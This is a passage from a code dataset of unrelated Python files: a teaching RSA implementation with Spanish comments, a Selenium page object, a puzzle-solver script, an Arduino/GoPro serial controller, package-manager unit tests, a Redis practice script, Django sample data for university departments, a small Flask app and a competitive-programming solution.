cualquiera.\n b --- int --- Un entero cualquiera.\n\n >> Regresa:\n Una tupla (g, s, t) donde g es el máximo común divisor\n de 'n' y 'm', y se tiene que g = ns + mt.\n \"\"\"\n if n == 0 : \n return (m, 0, 1)\n \n g, s1, t1 = extended_gcd(m % n, n) \n \n s = t1 - (m // n) * s1 \n t = s1 \n \n return (g, s, t)\n\n\ndef mod_multiplicative_inverse(n, m):\n \"\"\"Devuelve el inverso multiplicativo de n modulo m.\n Se da por hecho que n es invertible en Zm.\n\n >> Argumentos:\n n --- int --- Un entero invertible en Zm.\n m --- int --- Un entero cualquiera.\n \n >> Regresa:\n El inverso de n en el anillo Zm.\n \"\"\"\n # Se tiene que gcd(n, m) = ns + mt\n g, s, _ = extended_gcd(n, m)\n inverse = s % m\n return inverse\n\n\ndef generate_keys(p, q):\n \"\"\"Genera las claves pública y privada del algoritmo.\n\n >> Argumentos:\n p --- int --- Un número primo\n q --- int --- Un número primo.\n\n >> Regresa:\n Una tupla con las claves pública y privada.\n \"\"\"\n n = p * q\n\n # Función phi de Euler aplicada a n.\n # Como p y q son primos, phi(n) = (p - 1) * (q - 1).\n phi = (p - 1) * (q - 1)\n\n # Obtenemos un entero 'e' coprimo con phi tal que:\n # 1 < e < phi.\n e = randrange(2, phi)\n while gcd(e, phi) != 1:\n e = randrange(3, phi)\n\n # Generamos una llave privada 'd' tal que:\n # (e * d) sea congruente con 1 (mód phi).\n d = mod_multiplicative_inverse(e, phi)\n\n public_key = (n, e)\n private_key = d\n\n return (public_key, private_key)\n\n\ndef encrypt(public_key, msg):\n \"\"\"Funcion encrypt.\n\n >> Argumentos:\n public_key --- tuple[int] --- La clave pública.\n msg --- string --- Una cadena con el mensaje.\n\n >> Regresa:\n ciphertext --- string --- Una cadena con el mensaje\n cifrado.\n \"\"\"\n n, e = public_key\n ciphertext = [pow(m, e, n) for m in text_to_numbers(msg)]\n return ciphertext\n\n\ndef decrypt(ciphertext, keys):\n \"\"\"Funcion Decrypt.\n\n >> Argumentos:\n ciphertext --- string --- Una cadena.\n d --- int --- La llave privada.\n n --- int --- El numero de entrada.\n\n >> Regresa:\n msg --- string --- Una cadena con el\n mensaje descifrado.\n \"\"\"\n public_key, private_key = keys\n n, e = public_key \n msg = [pow(c, private_key, n) for c in ciphertext]\n return numbers_to_text(msg)\n\n\ndef numbers_to_text(nums):\n \"\"\"Pasa una lista de numeros a una cadena\n de texto.\n\n >> Argumentos:\n nums --- Una lista de numeros.\n\n >> Regresa:\n text --- Una cadena de texto.\n \"\"\"\n text = ''.join([chr(n) for n in nums])\n return text\n\n\ndef text_to_numbers(text):\n \"\"\"Pasa una lista de caracteres a una lista\n de números enteros.\n\n >> Argumentos:\n nums --- Una lista de carácteres.\n\n >> Regresa:\n text --- Una lista de enteros.\n \"\"\"\n nums = [ord(c) for c in text]\n return nums\n","sub_path":"rsa/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574788743","text":"from selenium.common.exceptions import (NoSuchElementException,\n\tStaleElementReferenceException, WebDriverException)\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver import ActionChains as AC\nfrom page import Page\nfrom components import menu\nfrom components import header\nimport time\nimport main\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait as WDW\n\nclass EmployeeViewPage(Page):\n\turl_tail = \"employee/\" #i.e. https://ppay11.herokuapp.com/employee/ead0ade1\n\tdynamic = True\n\n\tdef load(self):\n\t\ttry:\n\t\t\tself.admin_options = ['none', 'manager', 'executive']\n\t\t\tself.load_tabs()\n\t\t\tif self.selected_tab == 'info':\n\t\t\t\tself.load_information()\n\t\t\t\t\t# employee_name\n\t\t\t\t\t# edit_button\n\t\t\t\t\t# employee_id\n\t\t\t\t\t# enroll_date\n\t\t\t\t\t# status\n\t\t\t\t\t# election\n\t\t\t\t\t# edit form\n\t\t\t\t# print('loaded info')\n\t\t\telif self.selected_tab == 'history':\n\t\t\t\tself.load_history()\n\t\t\t\t\t# Table with entries\n\t\t\t\t\t\t# election_amt\n\t\t\t\t\t\t# election_date\n\t\t\t\t\t\t# election_pdf\n\t\t\t\t# print('loaded history')\n\t\t\telif self.selected_tab == 'permissions':\n\t\t\t\tself.load_permissions()\n\t\t\t\t\t# admin_radios\n\t\t\t\t# print('loaded perms')\n\t\t\tself.menu = menu.SideMenu(self.driver)\n\t\t\tself.header = header.PrivateHeader(self.driver)\n\t\t\treturn True\n\t\texcept (NoSuchElementException, StaleElementReferenceException,\n\t\t\t\tWebDriverException) as e:\n\t\t\t#print(str(e))\n\t\t\treturn False\n\n\tdef is_editing(self):\n\t\ttry:\n\t\t\tel = self.driver.find_element_by_class_name('sm-employee-edit-form')\n\t\t\treturn True\n\t\texcept NoSuchElementException:\n\t\t\treturn False\n\n\tdef load_tabs(self):\n\t\t# elements always visible\n\t\tfind_by = self.driver.find_element_by_id\n\n\t\tself.info_tab = self.driver.find_element_by_id(\"employee_info\")\n\t\tself.permissions_tab = self.driver.find_element_by_id(\"employee_permissions\")\n\n\t\t# history tab does not exist for admin only users\n\t\ttry:\n\t\t\tself.history_tab = self.driver.find_element_by_id(\"employee_history\")\n\t\texcept NoSuchElementException:\n\t\t\tself.history_tab = None\n\n\t\tself.selected_tab = self.current_tab()\n\t\t# if all(x != None for x in (self.info_tab, self.history_tab)): #self.edit_button,self.employee_name)):\n\t\t# \treturn True\n\t\t# else:\n\t\t# \treturn False\n\n\t# def load_tabs(self):\n\t# \t# These should always be visible on employee_view page.\n\t# \tself.info_tab = self.driver.find_element_by_id(\"employee_info\")\n\t# \tself.history_tab = self.driver.find_element_by_id(\"employee_history\")\n\t# \tself.permissions_tab = self.driver.find_element_by_id(\"employee_permissions\")\n\t# \t# try:\n\t# \t# \tself.info_tab = self.driver.find_element_by_id(\"employee_info\")\n\t# \t# except (NoSuchElementException, StaleElementReferenceException) as e:\n\t# \t# \tself.info_tab = None\n\t# \t# \tprint('Failed to load info tab. \\n' + str(e))\n\t# \t# \treturn False\n\t# \t# try:\n\t# \t# \tself.history_tab = self.driver.find_element_by_id(\"employee_history\")\n\t# \t# except (NoSuchElementException, StaleElementReferenceException) as e:\n\t# \t# \tself.history_tab = None\n\n\t# \t# try:\n\t# \t# \tself.permissions_tab = self.driver.find_element_by_id(\"employee_permissions\")\n\t# \t# except NoSuchElementException:\n\t# \t# \tself.permissions_tab = None\n\t# \t# except Exception as e:\n\t# \t# \tprint(str(e))\n\t# \t# \treturn False\n\t# \t# return True\n\n########################## INFORMATION TAB ###############################\n\n\tdef load_information(self):\n\t\tif self.is_editing():\n\t\t\tself.load_edit_form()\n\t\t\t\t# id_input\n\t\t\t\t# name_inputs (first/last)\n\t\t\t\t# save button\n\t\telse:\n\t\t\tself.body = self.driver.find_element_by_tag_name('section')\n\t\t\tself.employee_name = self.try_load_name()\n\t\t\tself.edit_button = self.try_load_edit()\n\t\t\tself.load_default()\n\n\tdef try_load_edit(self):\n\t\ttry:\n\t\t\treturn self.body.find_element_by_tag_name('button')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_name(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_tag_name(\"h1\")\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef load_default(self):\n\t\t# visible when not editing\n\t\tself.info_table = self.try_load_info_table()\n\t\tself.id = self.try_load_id()\n\t\tself.status = self.try_load_status()\n\t\t#self.admin_role = self.try_load_admin_role()\n\t\tself.election = self.try_load_election()\n\t\tif all(x != None for x in (self.id,self.status,self.election)) or len(self.info_table.find_elements_by_tag_name('tr')) is 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef try_load_info_table(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_tag_name('tbody')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_id(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[0]\n\t\t\treturn row.find_element_by_tag_name('td')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_status(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[2]\n\t\t\treturn row.find_element_by_tag_name('td')\n\t\texcept (NoSuchElementException, IndexError):\n\t\t\treturn None\n\n\tdef try_load_election(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[3]\n\t\t\treturn row.find_element_by_tag_name('td')\n\t\texcept (NoSuchElementException, IndexError):\n\t\t\treturn None\n\n\tdef get_status(self):\n\t\t#Doesn't work when editing employee\n\t\treturn self.status.text\n\n\tdef load_edit_form(self):\n\t\t# elements only visible when editing\n\t\tif not self.is_editing():\n\t\t\t#print('not editing?')\n\t\t\tself.edit_form = None\n\t\t\tself.id_input = None\n\t\t\tself.first_name = None\n\t\t\tself.last_name = None\n\t\t\tself.save_changes = None\n\t\t\treturn False\n\t\telse:\n\t\t\t#print('editing')\n\t\t\tcss = 'sm-employee-edit-form'\n\t\t\tself.edit_form = self.driver.find_element_by_class_name(css)\n\t\t\ttry:\n\t\t\t\tself.id_input = self.body.find_elements_by_tag_name('input')[0]\n\t\t\t\tself.first_name = self.body.find_elements_by_tag_name('input')[1]\n\t\t\t\tself.last_name = self.body.find_elements_by_tag_name('input')[2]\n\t\t\texcept IndexError:\n\t\t\t\tself.id_input = None\n\t\t\t\tself.first_name = self.body.find_elements_by_tag_name('input')[0]\n\t\t\t\tself.last_name = self.body.find_elements_by_tag_name('input')[1]\n\t\t\texcept Exception:\n\t\t\t\t#print(str(e))\n\t\t\t\treturn False\n\t\t\tself.save_changes = self.edit_form.find_element_by_tag_name('button')\n\t\t\treturn True\n\n\tdef edit(self):\n\t\t\"\"\"Click edit button and return status of loading edit form\"\"\"\n\t\tif self.current_tab() != 'information':\n\t\t\tself.move_to_el(self.info_tab)\n\t\t\tself.load()\n\n\t\tself.move_to_el(self.edit_button)\n\t\t# Look for primary button (will be disabled initally)\n\t\t# should always be there no matter what user's role/status is\n\t\tWDW(self.driver, 10).until(\n\t\t\tEC.presence_of_element_located((By.CLASS_NAME, 'primaryButton')))\n\t\tself.load()\n\n\tdef set_id(self,new_id):\n\t\tif not self.is_editing():\n\t\t\tself.edit()\n\t\t\t#print('clicked edit')\n\t\ttry:\n\t\t\tself.id_input.clear()\n\t\t\tself.id_input.send_keys(new_id)\n\t\t\ttime.sleep(.2)\n\t\t\treturn True\n\t\texcept NameError:\n\t\t\treturn False\n\n\tdef get_id(self):\n\t\t# get ID from self.id. self.id_input if editing\n\t\tif self.is_editing():\n\t\t\t#print('editing')\n\t\t\treturn self.id_input.get_attribute('value')\n\t\telse:\n\t\t\tprint('not editing')\n\t\t\treturn self.id.text\n\n\tdef set_first_name(self, name):\n\t\tif not self.is_editing():\n\t\t\tself.edit()\n\t\ttry:\n\t\t\tself.first_name.clear()\n\t\t\tself.first_name.send_keys(name)\n\t\t\ttime.sleep(.2)\n\t\t\treturn True\n\t\texcept NameError:\n\t\t\treturn False\n\n\tdef get_first_name(self):\n\t\tif self.is_editing():\n\t\t\treturn self.first_name.get_attribute('value')\n\t\telse:\n\t\t\treturn self.employee_name.split(' ')[0]\n\n\tdef set_last_name(self, name):\n\t\tif not self.is_editing():\n\t\t\tself.edit()\n\t\ttry:\n\t\t\tself.last_name.clear()\n\t\t\tself.last_name.send_keys(name)\n\t\t\ttime.sleep(.2)\n\t\t\treturn True\n\t\texcept NameError:\n\t\t\treturn False\n\n\tdef get_last_name(self):\n\t\tif self.is_editing():\n\t\t\treturn self.last_name.get_attribute('value')\n\t\telse:\n\t\t\treturn self.employee_name.split(' ', 1)[1]\n\t\t\t#Return everything after 1st name (denoted by space)\n\n\tdef click_save_changes(self):\n\t\t\"\"\"Click save, load stuff, return True if stuff loads\n\t\treturn false if not editing, or save button disabled (no changes)\"\"\"\n\t\tif self.is_editing() and self.save_changes.is_enabled():\n\t\t\tself.save_changes.click()\n\t\t\tWDW(self.driver, 10).until_not(EC.presence_of_element_located((By.CLASS_NAME, 'primaryButton')))\n\t\t\treturn self.load()\n\t\t\t# return self.load_default()\n\t\treturn False\n\n\n###################### HISTORY TAB ###############################\n\n\tdef load_history(self):\n\t\thistory_table = self.driver.find_element_by_tag_name('table')\n\n\tdef load_first_entry(self):\n\t\ttry:\n\t\t\tentry = self.history_table.find_elements_by_tag_name('tr')[0]\n\t\t\tself.election_amt = self.entry.find_elements_by_tag_name('td')[0]\n\t\t\tself.election_date = self.entry.find_elements_by_tag_name('td')[1]\n\t\t\tself.election_pdf = self.entry.find_elements_by_tag_name('td')[2]\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.election_amt = None\n\t\t\tself.election_date = None\n\t\t\tself.election_pdf = None\n\t\t\treturn False\n\n\n######################## PERMISSIONS TAB #############################\n\n\tdef load_permissions(self):\n\t\tself.radio_group = self.driver.find_element_by_id('permission_group')\n\t\tself.admin_radios = self.radio_group.find_elements_by_tag_name('input')\n\t\t#self.admin_none = self.admin_radios.find_elements_by_tag_name('input')[0]\n\t\t#self.admin_manager = self.admin_radios.find_elements_by_tag_name('input')[1]\n\t\t#self.admin_executive = self.admin_radios.find_elements_by_tag_name('input')[2]\n\n\tdef try_load_admin_role(self):\n\t\ttry:\n\t\t\trow = self.info_table.find_elements_by_tag_name('tr')[4]\n\t\t\ttd = row.find_element_by_tag_name('td')\n\t\t\treturn td.text.lower()\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef role_to_index(self, admin_role):\n\t\t# Return index of radio button given role (none, manager, executive)\n\t\treturn self.admin_options.index(admin_role)\n\n\tdef current_radio(self):\n\t\t# Return text corresponding to currently selected radio button\n\t\tfor i, radio in enumerate(self.admin_radios):\n\t\t\tif radio.is_selected():\n\t\t\t\treturn self.admin_options[i]\n\n\tdef get_admin_role_radio(self):\n\t\t# Return admin role according to radio buttons (edit mode)\n\t\treturn self.current_radio()\n\n\tdef get_admin_role(self):\n\t\t# Return admin role according to text (not editing)\n\t\t#click permissions tab, get highlighted radio, translate to role\n\t\tself.permissions_tab.click()\n\t\tself.load()\n\t\treturn self.current_radio()\n\t\t'''if self.is_editing():\n\t\t\tself.click_edit()\n\t\treturn self.admin_role'''\n\n\tdef set_admin_role(self, admin_role):\n\t\t# Will not work for yourself (cannot edit own role)\n\t\tif self.current_tab() != 'permissions':\n\t\t\tself.permissions_tab.click()\n\t\t\tself.load()\n\t\tif admin_role in self.admin_options:\n\t\t\t# permission checkboxes should always be visible now (in the right tab)\n\t\t\t# make sure role checkboxes are visible and above save button\n\t\t\t# if not main.is_desktop():\n\t\t\t# \tself.scroll_to_top() # start at top of page\n\t\t\t# \tel_bottom = self.get_el_location(self.admin_radios[2], 'bottom')\n\t\t\t# \twindow_height = self.get_window_height()\n\t\t\t# \t# add 48 for save button (legacy)\n\t\t\t# \tscroll_distance = el_bottom - window_height\n\t\t\t# \tself.move('down', scroll_distance)\n\n\t\t\t# toggle radio\n\t\t\t# print(self.admin_radios)\n\t\t\tself.admin_radios[self.role_to_index(admin_role)].click()\n\n\t\t\t# Need some kind of pause to let stuff load or you'll get WebDriverException.\n\t\t\t# Not sure if there's a WDWait that makes sense.\n\t\t\ttime.sleep(.4)\n\t\telse:\n\t\t\traise Exception(\"Unexpected admin role: \" + str(admin_role))\n\n\tdef role_is_editable(self,index):\n\t\treturn self.admin_radios[index].is_enabled()\n\n\tdef current_tab(self):\n\t\t\"\"\"Determine selected tab by background color\"\"\"\n\t\tselected = \"rgba(56, 217, 244,\"\n\t\tif selected in self.info_tab.value_of_css_property('color'):\n\t\t\treturn 'info'\n\t\telif self.history_tab is not None and selected in self.history_tab.value_of_css_property('color'):\n\t\t\treturn 'history'\n\t\telif self.permissions_tab is not None and selected in self.permissions_tab.value_of_css_property('color'):\n\t\t\treturn 'permissions'\n\t\traise Exception(\"Unexpected tab behavior!\")","sub_path":"testing/pages/employee_view.py","file_name":"employee_view.py","file_ext":"py","file_size_in_byte":11945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"457518222","text":"\"\"\"Script for testing the Game.solve() function, or for generating solutions.\"\"\"\nimport os\nfrom Game import Game, GameWorld\n\nsave_world = 1\ndo_solve = False\nsolve_all = 0 # 0 to solve only unsolved\nprint_stats = 1\n\nWORLD_DIR = \"Worlds\"\nworld_files = sorted(os.listdir(WORLD_DIR))\n\nif print_stats:\n for world_file in world_files:\n world = GameWorld(world_file, \"Worlds\")\n levels = world.levels\n n_unsolved, n_solved_optimally, n_solved_manually, = 0, 0, 0\n for level_i, solution in enumerate(world.solutions):\n if solution[0] is None:\n n_unsolved += 1\n # print(world.level_ids[level_i])\n elif \"cost-optimal\" in solution[1]:\n n_solved_optimally += 1\n elif \"manual moves\" in solution[1] or \"manually solved\" in solution[1]:\n n_solved_manually += 1\n else:\n print(f\"unintelligible solution info: {solution[1]}\")\n print(f'{world_file} contains {n_unsolved} unsolved, {n_solved_optimally} optimally solved, and ' +\n f'{n_solved_manually} (at least partially) manually-solved puzzles.')\n\n\nif do_solve:\n for world_file in world_files:\n world = GameWorld(world_file, \"Worlds\")\n levels = world.levels\n for level_i in range(len(levels)):\n level_id = world.level_ids[level_i]\n full_id = f\"{world_file}#{level_id}\"\n game = Game(levels[level_i], level_id, False, world.solutions[level_i])\n if solve_all or game.solution_state is None:\n game.solve()\n msg1 = f\"{full_id}: {game.solution_info}\"\n if game.solution_state:\n msg2 = world.check_and_update_solution(level_i, (game.solution_string(), game.solution_info))\n if save_world:\n world.save()\n else:\n msg2 = \"\"\n print(f\"{msg1:110} {msg2}\")\n\n","sub_path":"test_solve.py","file_name":"test_solve.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"538355657","text":"from time import sleep\nimport serial\nfrom goprocam import GoProCamera\nfrom goprocam import constants\n\n\nser = serial.Serial('/dev/ttyACM0', 9600) # Establish the connection on a specific port\ncounter = 32 # Below 32 everything in ASCII is gibberish\n\ndef writeToArduino(text):\n global ser\n returnObject = \"\"\n ser.write(bytes(text,'utf-8')) # Convert the decimal number to ASCII then send it to the Arduino\n return returnObject \n\ndef readFromArduino():\n global ser\n returnObject = bytes(\"\",'utf-8')\n for x in range(0,3):\n counter = 32 # Below 32 everything in ASCII is gibberish\n returnObject = returnObject + ser.readline() # Read the newest output from the Arduino\n sleep(.2) # Delay for one tenth of a second\n if counter == 255:\n counter = 32\n \n return returnObject\n\ndef takePicture():\n gpCam = GoProCamera.GoPro()\n TIMER=4\n gpCam.downloadLastMedia(gpCam.take_photo(TIMER)) #take a photo in 4 seconds and download it.\n print(\"Picture has been taken and downloaded.\")\n\n\nwhile (True):\n userInput = input(\":\")\n if(userInput == \"raise\" or userInput == \"lower\" or userInput == \"r\" or userInput == \"l\"):\n print(writeToArduino(userInput))\n for x in readFromArduino().split(bytes('\\n','utf-8')):\n print(x[0:-1])\n if(userInput == \"photo\"):\n takePicture()\n \n\n\n","sub_path":"testScripts/serialTest.py","file_name":"serialTest.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"319600407","text":"import unittest\nfrom sru_pkgmgr import helper\nfrom sru_pkgmgr import settings\n\nimport os\n\nclass TestControllers(unittest.TestCase):\n def setUp(self):\n helper.packageSetup()\n self.packages = helper.load_packages()\n\n def test_package_setup(self):\n self.assertTrue(helper.packageSetup())\n self.assertTrue(os.path.isfile(settings.PACKAGES))\n\n def test_load_package(self):\n packages = helper.load_packages()\n self.assertIsNotNone(packages)\n \n def test_save_packages(self):\n packages = helper.load_packages()\n result = helper.save_packages(packages)\n self.assertIsNotNone(result)\n\n def test_add_package_1(self):\n # new package\n package = {\n \"name\": \"test\",\n \"version\": \"0.1.0\",\n \"link\": \"https://test\"\n }\n old_packages = helper.load_packages()\n new_packages = helper.add_package(package)\n self.assertNotEqual(\n len(old_packages[\"packages\"]), \n len(new_packages[\"packages\"])\n )\n\n def test_add_package_2(self):\n # existing package\n package = helper.load_packages()[\"packages\"][0]\n old_packages = helper.load_packages()\n new_packages = helper.add_package(package)\n self.assertEqual(\n len(old_packages[\"packages\"]), \n len(new_packages[\"packages\"])\n )\n \n def test_rmove_package_1(self):\n # existing package\n package = helper.load_packages()[\"packages\"][0]\n old_packages = helper.load_packages()\n new_packages = helper.remove_package(package)\n self.assertNotEqual(\n len(old_packages[\"packages\"]), \n len(new_packages[\"packages\"])\n )\n \n def test_rmove_package_2(self):\n # non existing package\n package = {\n \"name\": \"test\",\n \"version\": \"0.1.0\",\n \"link\": \"https://test\"\n }\n old_packages = helper.load_packages()\n new_packages = helper.remove_package(package)\n self.assertEqual(\n len(old_packages[\"packages\"]), \n len(new_packages[\"packages\"])\n )\n \n def test_installed_packages(self):\n installed = helper.installed_packages()\n print('c')\n\n def tearDown(self):\n self.assertTrue(os.path.isfile(settings.PACKAGES))\n os.remove(settings.PACKAGES)\n self.assertFalse(os.path.isfile(settings.PACKAGES))\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"238104212","text":"\"\"\"\n test file for experimenting with redis\n\"\"\"\n\n# import login_database\n# import utilities\nfrom random import choice as rc\n\n\ndef create_random_phone():\n area = rc(['206-', '360-', '425-'])\n prefix = rc(['234-', '321-', '456-', '987-'])\n suffix = rc(['1212', '2789', '3767', '4123', '5555'])\n return area + prefix + suffix\n\n\ndef choose_random_zip():\n return rc(['98101', '98112', '98127', '98155'])\n\n\ndef run_example():\n names = ('Andrew', 'Peter', 'Susan', 'Pam', 'Steven', 'Charlotte')\n # fields = (':telephone', ':zip')\n # r = login_database.login_redis_cloud()\n\n try:\n for name in names:\n # r.set(customer, create_random_phone())\n # r.set(customer, choose_random_zip())\n customer = 'customer:' + name\n print(customer + ':telephone,', create_random_phone())\n print(customer + ':zip,', choose_random_zip())\n\n except Exception as e:\n print(f'Redis error: {e}')\n\n\nif __name__ == '__main__':\n run_example()\n","sub_path":"students/johnpharmd/lesson08/src/test_redis.py","file_name":"test_redis.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"526914749","text":"from envio.models import Centro, Estudio, Plan, Persona, Matricula, Entrega, Departamento\n\ncentros = [ \n Centro(100, 'Facultad de Ciencias','Z'),\n Centro(101, 'Facultad de Economía y Empresa', 'Z'),\n Centro(102, 'Facultad de Derecho', 'Z'),\n Centro(109, 'Facultad de Economía y Empresa', 'Z'),\n Centro(110, 'Escuela de Ingeniería y Arquitectura', 'Z'),\n Centro(228, 'Facultad de Empresa y Gestión Pública', 'Z'),\n Centro(175, 'Escuela Universitaria Politécnica de la Almunia','A'),\n Centro(302, 'Facultad de Ciencias Sociales y Humanas', 'Z'),\n Centro(326, 'Escuela Universitaria Politécnica de Teruel', 'T'),\n]\n\nfor c in centros:\n c.save()\n\nestudios = [\n\tEstudio(134, 'Graduado en Finanzas y Contabilidad', 5),\n\tEstudio(157, 'Graduado en Estudios en Arquitectura', 5),\n\tEstudio(148, 'Graduado en Ingeniería Informática', 5),\n]\n\nfor e in estudios:\n e.save()\n\n\nplanes = [\n\tPlan(pid=449, curso='2018', estudio=Estudio.objects.get(eid=134), centro=Centro.objects.get(cid=109)),\n\tPlan(pid=470, curso='2018', estudio=Estudio.objects.get(eid=157), centro=Centro.objects.get(cid=110)),\n\tPlan(pid=439, curso='2018', estudio=Estudio.objects.get(eid=148), centro=Centro.objects.get(cid=110)),\n\tPlan(pid=443, curso='2018', estudio=Estudio.objects.get(eid=148), centro=Centro.objects.get(cid=326)),\n]\n\nfor p in planes:\n p.save()\n\n\n\ndepartamentos = [\nDepartamento(1, 'Análisis Económico'),\nDepartamento(2, 'Anatomía e Histología Humanas'),\nDepartamento(3, 'Anatomía Patológica, Medicina Legal y Forense y Toxicología'),\nDepartamento(4, 'Anatomía, Embriología y Genética Animal'),\nDepartamento(5, 'Bioquímica y Biología Molecular y Celular'),\nDepartamento(6, 'Ciencia y Tecnología de Materiales y Fluidos'),\nDepartamento(7, 'Ciencias Agrarias y del Medio Natural'),\nDepartamento(8, 'Ciencias de la Antigüedad'),\nDepartamento(9, 'Ciencias de la Documentación e Historia de la Ciencia'),\nDepartamento(10, 'Ciencias de la Educación'),\nDepartamento(11, 'Ciencias de la Tierra'),\nDepartamento(12, 'Cirugía, Ginecología y Obstetricia'),\nDepartamento(13, 'Contabilidad y Finanzas'),\nDepartamento(14, 'Derecho de la Empresa'),\nDepartamento(15, 'Derecho Penal, Filosofía del Derecho e Historia del Derecho'),\nDepartamento(16, 'Derecho Privado'),\nDepartamento(17, 'Derecho Público'),\nDepartamento(18, 'Didáctica de las Ciencias Experimentales'),\nDepartamento(19, 'Didáctica de las Lenguas y de las Ciencias Humanas y Sociales'),\nDepartamento(20, 'Dirección de Marketing e Investigación de Mercados'),\nDepartamento(21, 'Dirección y Organización de Empresas'),\nDepartamento(22, 'Estructura e Historia Económica y Economía Pública'),\nDepartamento(23, 'Expresión Musical, Plástica y Corporal'),\nDepartamento(24, 'Farmacología y Fisiología'),\nDepartamento(25, 'Filología Española'),\nDepartamento(26, 'Filología Francesa'),\nDepartamento(27, 'Filología Inglesa y Alemana'),\nDepartamento(28, 'Filosofía'),\nDepartamento(29, 'Fisiatría y Enfermería'),\nDepartamento(30, 'Fisica Aplicada'),\nDepartamento(31, 'Física de la Materia Condensada'),\nDepartamento(32, 'Física Teórica'),\nDepartamento(33, 'Geografía y Ordenación del Territorio'),\nDepartamento(34, 'Historia del Arte'),\nDepartamento(35, 'Historia Medieval, Ciencias y Técnicas Historiográficas y Estudios Árabes e Islámicos'),\nDepartamento(36, 'Historia Moderna y Contemporánea'),\nDepartamento(37, 'Informática e Ingeniería de Sistemas'),\nDepartamento(38, 'Ingeniería de Diseño y Fabricación'),\nDepartamento(39, 'Ingeniería Eléctrica'),\nDepartamento(40, 'Ingeniería Electrónica y Comunicaciones'),\nDepartamento(41, 'Ingeniería Mecánica'),\nDepartamento(42, 'Ingeniería Química y Tecnologías del Medio Ambiente'),\nDepartamento(43, 'Lingüística General e Hispánica'),\nDepartamento(44, 'Matemática Aplicada'),\nDepartamento(45, 'Matemáticas'),\nDepartamento(46, 'Medicina, Psiquiatría y Dermatología'),\nDepartamento(47, 'Métodos Estadísticos'),\nDepartamento(48, 'Microbiología, Medicina Preventiva y Salud Pública'),\nDepartamento(49, 'Patología Animal'),\nDepartamento(50, 'Pediatría, Radiología y Medicina Física'),\nDepartamento(51, 'Producción Animal y Ciencia de los Alimentos'),\nDepartamento(52, 'Psicología y Sociología'),\nDepartamento(53, 'Química Analítica'),\nDepartamento(54, 'Química Física'),\nDepartamento(55, 'Química Inorgánica'),\nDepartamento(56, 'Química Orgánica'),\nDepartamento(57, 'Unidad Predepartamental de Arquitectura'),\n]\n\nfor d in departamentos:\n d.save()","sub_path":"envio/sample-data-load.py","file_name":"sample-data-load.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"433059146","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*- \n#author: songbinming\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom flask import Flask, render_template, abort, send_from_directory, request\nimport docker\n\napp = Flask(__name__)\nc = docker.Client(base_url=\"unix://var/run/docker.sock\")\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/jar\", methods=[\"GET\", \"POST\"])\ndef jar_deploy():\n service_list=[\"ucenter\", \"cis-service\", \"oms-service\", \"mms-service\", \"push-service\", \"mms-cron\", \"pay-service\"]\n # if request.method == 'POST':\n # service = request.form['service']\n # msg = [ str(x) for x in dubbo_deploy(service).split('\\n') if x != '']\n # return render_template(\"jar.html\", service_list = service_list, msg=msg)\n # else:\n return render_template(\"jar.html\", service_list = service_list)\n\nif __name__ == \"__main__\":\n\tapp.run(host=\"0.0.0.0\",port=80,debug=True)\n","sub_path":"run_template.py","file_name":"run_template.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"526139528","text":"from typing import List\n\nimport itertools\n\n\ndef get_answer(n: int, k: int, ll_t: List[List[int]]) -> int:\n\n l_p = list(itertools.permutations([i for i in range(1, n)]))\n\n result = 0\n for p in l_p:\n p = [0] + list(p) + [0]\n\n time = 0\n for j in range(len(p) - 1):\n t = ll_t[p[j]][p[j+1]]\n time += t\n\n if time == k:\n result += 1\n\n return result\n\n\nif __name__ == \"__main__\":\n N, K = map(int, input().split())\n\n T = []\n for _ in range(N):\n T.append(list(map(int, input().split())))\n\n print(get_answer(N, K, T))\n","sub_path":"abc183/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"284666833","text":"import sys\nimport os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nimport scipy.io as sio\n\nfrom PIL import Image, ImageDraw\nfrom pyramid import build_sfd\nfrom layers import *\nimport cv2\nimport numpy 